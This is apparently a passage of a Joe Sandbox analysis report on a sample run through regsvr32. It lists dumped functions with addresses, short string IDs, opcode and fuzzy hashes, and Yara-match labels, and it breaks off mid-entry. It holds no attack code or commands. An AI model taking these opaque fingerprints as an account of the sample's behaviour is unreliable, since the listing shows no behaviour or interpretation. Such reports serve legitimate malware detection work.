                                                                      • API ID:
                                                                      • String ID: #X$"n&E
                                                                      • API String ID: 0-1188898577
                                                                      • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                      • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                      • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                      • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800176B8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Bw~$fy
                                                                      • API String ID: 0-1663007907
                                                                      • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                      • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                      • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                      • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180013150 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /0$XyLe
                                                                      • API String ID: 0-3562702181
                                                                      • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                      • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                      • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                      • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800190D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >I$>I
                                                                      • API String ID: 0-3948471910
                                                                      • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                      • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                      • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                      • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180013E28 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %'#$'1O"
                                                                      • API String ID: 0-3508158491
                                                                      • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                      • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                      • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                      • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001DA80 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {H2}$}i#c
                                                                      • API String ID: 0-1724349491
                                                                      • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                      • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                      • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                      • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800269B0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4V$so
                                                                      • API String ID: 0-1060102820
                                                                      • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                      • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                      • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                      • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800296EC Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: F+'$O$
                                                                      • API String ID: 0-4064122715
                                                                      • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                      • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                      • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                      • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800121CC Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$bO6
                                                                      • API String ID: 0-3242911120
                                                                      • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                      • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                      • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                      • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019D60 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )j-J$\rba
                                                                      • API String ID: 0-105394296
                                                                      • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                      • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                      • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                      • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180024698 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5T$7c
                                                                      • API String ID: 0-2666566123
                                                                      • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                      • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                      • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                      • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180017BDC Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ",)x$PX
                                                                      • API String ID: 0-926260526
                                                                      • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                      • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                      • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                      • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC39C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                      • Instruction ID: 36d7a2703d270d8837218463388f200c481518927d1596947a901957922758cc
                                                                      • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                      • Instruction Fuzzy Hash: FE119833A08586C5FA705B65ECA13B913D0EB86788F4C8431DA8D86A89CFACE546D314
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC834 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                      • Instruction ID: c6df65eee797d80633042929ce35807400f60a9c62f2d246e94d2e9497c2ed84
                                                                      • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                      • Instruction Fuzzy Hash: FE112E73E08605C6FB188B31C8663792AD0FB96B09F1C8435C60D46ACACFBCD594A685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC8C8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFA526A5A8C), ref: 00007FFA526AC8FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                      • Instruction ID: e4b356e8cc52ce642f3f79bab6792aa1653a7a2353b6fc51f6951d0d29e4a928
                                                                      • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                      • Instruction Fuzzy Hash: 3EF08C63E08506CAFB188B35C8263BA26D1FB96B48F1CC031C64D42A8ACFACD591A241
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526ADF3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                      • Instruction ID: 3fe68f8785d76eb807760e24f6b931c54e77daf861cd6cdd2d821c18bd8414d6
                                                                      • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                      • Instruction Fuzzy Hash: 29F05E22A186C083D7118B1AF44415AE7A1FBC5BE0F588221EA9D17F9DCF6CC896CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AE1E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                      • Instruction ID: 33a1dc6ccfa0e8e606c21389b8800ec4cee889f1be3ce6e5826193f419f28beb
                                                                      • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                      • Instruction Fuzzy Hash: 3BE06D21A1C681C1F6309720EC513AA37D0FF9A758F888231DA9D46EA9DFACE2559B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC7F4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                      • Instruction ID: 949756e798081e37e0839643056498297ff1aaab0c52d4cfdf688d34e31a245c
                                                                      • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                      • Instruction Fuzzy Hash: 56E08667E0564582EB088B61DC9537426D1EF95B09F0CC031CA1C41599CFFCC596C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800125C4 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cYte
                                                                      • API String ID: 0-489798635
                                                                      • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                      • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                      • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                      • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002A9A8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Pc
                                                                      • API String ID: 0-2609325410
                                                                      • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                      • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                      • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                      • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001ED50 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g >
                                                                      • API String ID: 0-3862707646
                                                                      • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                      • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                      • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                      • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180018DAC Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-2012265552
                                                                      • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                      • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                      • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                      • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800288B8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Wcl
                                                                      • API String ID: 0-2623992880
                                                                      • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                      • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                      • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                      • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180029888 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ws8
                                                                      • API String ID: 0-2196714860
                                                                      • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                      • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                      • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                      • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180017908 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p/g
                                                                      • API String ID: 0-1786412500
                                                                      • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                      • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                      • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
